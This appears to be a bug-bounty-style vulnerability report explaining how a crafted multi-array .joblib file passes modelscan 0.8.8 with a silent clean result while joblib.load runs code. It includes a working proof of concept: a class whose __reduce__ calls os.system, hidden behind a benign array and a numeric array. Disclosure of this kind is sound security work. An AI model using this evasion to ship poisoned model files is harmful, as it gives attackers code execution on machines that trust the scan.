YAML Metadata Warning:empty or missing yaml metadata in repo card
Check out the documentation for more information.
modelscan silent (exit-0) bypass β a numeric numpy array truncates genops in a multi-array joblib, hiding a trailing object-array pickle.load RCE
Severity: High (silent CLEAN pass β total_issues=0, errors=0, file marked scanned, exit 0 β while joblib.load achieves RCE)
Affected tool: modelscan 0.8.8 β PickleUnsafeOpScan / tools/picklescanner.py. Loader: joblib.load (joblib 1.5.3, NumpyArrayWrapper.read_array).
Category: ModelScan scanner-bypass on .joblib ($4k format).
Summary
joblib stores a multi-array container as a flat sequence [wrapper#1][array#1 data][wrapper#2][array#2 data]β¦, where each array's data is read positionally: numeric arrays as exactly N*itemsize raw bytes, object-dtype arrays as a nested pickle.load. modelscan doesn't model this framing β it feeds the whole raw file to _list_globals, which loops pickletools.genops. In the layout {benign object-array, numeric array, malicious object-array}:
- the leading benign object array is a valid pickle prefix ending in STOP β genops succeeds, modelscan collects only benign globals;
- the next numeric array's raw little-endian bytes are not valid opcodes β genops raises, but because globals were already found,
scan_pickle_bytesreturns those benign globals and stops without recording an error βerrorsstays empty; - the trailing malicious object array (
os.system+ REDUCE) lies in the region genops never reached β never scanned.
Result: total_issues=0, issues=[], errors=[], file marked scanned, CLI exit 0 (CLEAN). joblib.load reaches the trailing array positionally and pickle.load executes the payload. The leading benign object array is the key ingredient β it converts what would otherwise be a noisy PickleGenopsError (exit 2) into a silent clean pass.
Root cause
- Scanner:
modelscan/tools/picklescanner.py_list_globals(50-119, genops accumulation loop),scan_pickle_bytes(122-152) β onGenOpsErrorwithe.globalsnot None it returns_build_scan_result_from_raw_globals(e.globals,β¦)βScanResults(issues, [], [])(empty errors)..joblibroutes here viasettings.py(.joblib β PICKLE) +scanners/pickle/scan.pyPickleUnsafeOpScan(multiple_pickles=True). - Loader sink:
joblib/numpy_pickle.pyread_arraylines 173-175 βif self.dtype.hasobject: array = pickle.load(unpickler.file_handle)(object arrays = nestedpickle.loadRCE); numeric arrays readN*itemsizeraw bytes whose little-endian content terminates genops.
Reproduce
python poc/POC_clean_bypass.py (env: modelscan 0.8.8, joblib 1.5.3, numpy 1.26.4). Minimal:
class Evil:
def __reduce__(self): return (os.system, ('echo pwned> PWN.txt',))
joblib.dump({'feature_names': np.array(['age','income','score'], dtype=object),
'weights': np.array([0.1,0.2,0.3]),
'extra': np.array([Evil()], dtype=object)}, 'poc.joblib', compress=0)
Real modelscan -p poc.joblib -r json β {total_issues:0, issues:[], errors:[], total_scanned:1}, exit 0. joblib.load('poc.joblib') β os.system RCE (marker written). genops aborts at byte 501; system token at byte 737 (unparsed tail).
Differential controls (both ingredients load-bearing): top-level Evil β DETECTED (1 issue); {evil-objarr} no numeric β DETECTED; {benign-obj, evil-obj} no numeric gap β DETECTED; {numeric, evil-obj} no leading benign β 0 issues but PickleGenopsError (exit 2, noisy); {benign-obj, numeric, evil-obj} β 0 issues, 0 errors, exit 0 (SILENT CLEAN).
Impact
A malicious .joblib that modelscan reports fully clean (exit 0, marked scanned) achieves RCE on joblib.load. The trigger layout {object-array feature names, numeric weights, object-array} is the natural shape of real sklearn/pandas artifacts, so the payload is camouflaged as an ordinary model. Defeats modelscan as a pre-deploy/CI/HF-upload gate for .joblib/.pkl. (RCE primitive lives in the joblib loader; modelscan's silent false-negative is the detection-evasion vuln β a separately-reportable modelscan bypass.)
Dup-check
Distinct from GHSA-9gvj (STACK_GLOBAL offset-0 β crash/ValueError; here _list_globals returns valid globals and yields a CLEAN exit-0 pass, not a crash). Distinct from the picklescan ZIP/EOCD CVEs (no ZIP), GHSA-769v (extension bypass), and the Hide-and-Seek joblib compression bypasses (file is uncompressed and IS parsed). Distinct from CVE-2024-34997 (the joblib loader primitive, not a scanner bypass). Distinct from our R1 joblib 0x2e-STOP-byte (no crafted STOP byte; the genops terminator is natural numeric-array data; the novel ingredient is the multi-array positional layout + leading benign object array flipping errorβclean + trailing object-array pickle.load sink). No public source describes this.
Note: shares the "genops aborts before the gadget" class with our R2 FRAME-readline, R5 multi-pickle, and R8 int-radix findings β but the mechanism (numeric-array bytes + leading-benign-array silencing) and the silent-exit-0 outcome are distinct. Strongest representative for the
.joblibformat in that class.